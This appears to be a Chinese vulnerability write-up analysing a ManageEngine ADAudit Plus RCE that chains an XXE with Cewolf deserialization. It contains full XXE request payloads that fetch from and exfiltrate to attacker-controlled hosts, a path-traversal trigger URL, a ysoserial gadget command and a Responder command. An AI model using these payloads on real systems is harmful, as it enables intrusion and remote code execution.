太累了,老外三天发俩洞,学不过来了。

环境搭建

https://archives2.manageengine.com/active-directory-audit/7055/ManageEngine_ADAudit_Plus_x64.exe

需要搭建一个域环境,直接把安装adaudit的机器提升为域控就行。

分析

这个洞用了两个点串起来成了一个rce,分别是xxe和一个readObject的点。

Cewolf readObject

readObject是steventseeley挖掘的Cewolf反序列化,ADAudit仍然有这个servlet,并且init参数为FileStorage。

de.laures.cewolf.storage.FileStorage#getChartImage 这个地方存在readObject

详细的不讲了,看steventseeley在 https://srcincite.io/advisories/src-2020-0011/ 中提到的poc就懂了。

这个利用点需要在目标机器上上传一个序列化的payload,然后通过../跨目录触发。在下面的xxe中会串起来利用。

xxe

xxe来自比较常规的DocumentBuilderFactory类

在com.adventnet.sym.adsm.auditing.server.category.ProcessTrackingListener#parseTaskContent中

来自于eventTbl参数的Task Content或者Task New Content键值会造成xxe。

然后找路由触发点。

先来看web.xml

/api/agent对应com.adventnet.sym.adsm.auditing.webclient.ember.api.ADAPAgentAPIServlet#processRequest

跟入com.adventnet.sym.adsm.auditing.webclient.ember.api.RestAPIHandler#executeAgentRequest

通过正则匹配拿到对应的handler为com.adventnet.sym.adsm.auditing.webclient.ember.api.agent.AgentDataHandler#receiveData

在receiveData中通过读body取json,body取不到就从header中拿json,然后转成一个json数组jsonEventArray。接着如果是有效的json

交由com.adventnet.sym.adsm.auditing.server.EventDataAdapter#notify消息队列处理。

notify只负责向eventQueue中加事件,真正处理队列消息的地方在其子类com.adventnet.sym.adsm.auditing.server.EventDataAdapter.EventDispatcher#run

在这里需要关注一点,如果原始data中DomainName等于null,那么DomainDnsName也会等于null。

这个地方是个大坑,如果没有给对正确的域环境的域名,那么在下一步就不会触发漏洞,接着看。

通过重组modData,最终交由com.adventnet.sym.adsm.auditing.server.ProcessMonitor#process处理。

process函数会获取domainName对应的键值来迭代,最终调用addEventRows,如果你的传参DomainName为空,那么这个地方进入不了迭代循环,就触发不了漏洞。

跟进addEventRows

addEventRows会根据传入的CategoryId参数来获取不同的Listener,然后分发进入getEventRowList函数。

其中listener有很多,id为11的时候刚好是ProcessTrackingListener

接着走进com.adventnet.sym.adsm.auditing.server.category.ProcessTrackingListener#getEventRow

parseTaskContent到xxe的点

串联

有了xxe之后,需要了解一个jdk的老版本xxe trick。

这是2013年的议题

https://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf

在这个议题中提到,通过xxe我们可以上传文件和列举目录,jdk8u131之后的修复commit在这里

可以使用这个ftp服务器来使文件驻留到目标服务器中。

https://github.com/pwntester/BlockingServer/blob/master/BlockingServer.java

监听

发请求包

POST /api/agent/tabs/agentData HTTP/1.1
Host: 172.16.16.132:8081
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 316
Content-Type: application/json

[
    {
        "DomainName": "test.local",
        "EventCode": 4688,
        "EventType": 0,
        "TimeGenerated": 0,
        "Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY ssrf SYSTEM \"jar:http://172.16.16.1:2122/upload.jar!/file.txt\"> ]><foo>&ssrf;</foo>"
    }
]

此时文件被驻留在用户的临时目录下,我的用户是administrator,所以在C:/Users/Administrator/AppData/Local/Temp/目录下

接着用这个项目来列目录,监听之后发请求包

POST /api/agent/tabs/agentData HTTP/1.1
Host: 172.16.16.132:8081
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 393
Content-Type: application/json

[
    {
        "DomainName": "test.local",
        "EventCode": 4688,
        "EventType": 0,
        "TimeGenerated": 0,
        "Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE data [  <!ENTITY % file SYSTEM \"file:///C:/Users/Administrator/AppData/Local/Temp/\">  <!ENTITY % dtd SYSTEM \"http://192.168.1.207:9090/data.dtd\"> %dtd;]><data>&send;</data>"
    }
]

我们的url.txt就被传到了jar_cache9091707163659467742.tmp这个文件。

接下来就是触发反序列化的

http://172.16.16.132:8081/cewolf/a.png?img=/../../../../../../../../../Users/Administrator/AppData/Local/Temp/jar_cache9091707163659467742.tmp

gadget可以用cb192

java -jar .\ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho"

最后就是国际惯例

一些问题

  1. 如何获取DomainName
  2. c:/Users/Administrator/AppData/Local/Temp/jar_cache9091707163659467742.tmp 中administrator怎么判断?

第一个问题目前没啥解决办法,不过登录的时候可以获取到一部分的域名

第二个问题可以用笨方法先列举C:\Users\所有用户,然后列举用户的temp目录,或者直接Responder抓到当前用户名

sudo python3 Responder.py -I ens160

修复

注释了CewolfServlet

修了xxe

加了guid校验

点击收藏 | 2 关注 | 1
登录 后跟帖